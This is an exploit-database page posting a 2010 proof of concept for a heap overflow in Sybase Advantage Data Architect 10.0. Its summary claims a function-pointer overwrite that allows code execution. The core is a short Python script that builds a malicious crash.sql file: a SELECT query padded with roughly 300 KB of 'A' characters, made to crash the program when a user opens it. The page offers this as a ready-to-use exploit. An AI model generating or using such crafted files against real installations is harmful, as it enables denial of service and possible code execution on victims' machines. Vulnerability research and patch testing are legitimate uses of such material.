[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Sybase Advantage Data Architect "*.SQL" Format Heap Oveflow

Author
d0lc3
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14692
Category
dos / poc
Date add
02-11-2010
Platform
windows
===========================================================
Sybase Advantage Data Architect "*.SQL" Format Heap Oveflow
===========================================================

# Exploit Title: Sybase Advantage Data Architect "*.SQL" Format Heap Oveflow RCE
# Date: 2010-10-16
# Author: d0lc3 (@rmallof - http://elotrolad0.blogspot.com/)
# Software Link: http://www.sybase.com/products/databasemanagement/advantagedatabaseserver/data-architect-utility
# Version: 10.0
# Tested on: Windows XP SP3 32 bits SPA
#Summary:
"""
From Sybase.com:
"Advantage Data Architect Utility: A complete data management system for Advantage developers.
Advantage Data Architect assists in designing, creating and maintaining the database layer of
a developer's applications."
 
Advantage Data Architect is prone to heap overflow when user opens crafted script file (.SQL)
with long data inside.
This issue causes a function pointer overwrite, allow us executing arbitrary code (UNICODE).
More info can be found on : http://elotrolad0.blogspot.com/2010/11/sybase-advantage-data-architect-sql.html
"""
#!/usr/bin/python
 
sql="select * from clients where "
buf="A"*(1024*300)
 
crash=sql+buf+"="+buf
 
f=open("crash.sql",'w')
f.write(crash)
f.close()



#  0day.today [2024-11-16]  #